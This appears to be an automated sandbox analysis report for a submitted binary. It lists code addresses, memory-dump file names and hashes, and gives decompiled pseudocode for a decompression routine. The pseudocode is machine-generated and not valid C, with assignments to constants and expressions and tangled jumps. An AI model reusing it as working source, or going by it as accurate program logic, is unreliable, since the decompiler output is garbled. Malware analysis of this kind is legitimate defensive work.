0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
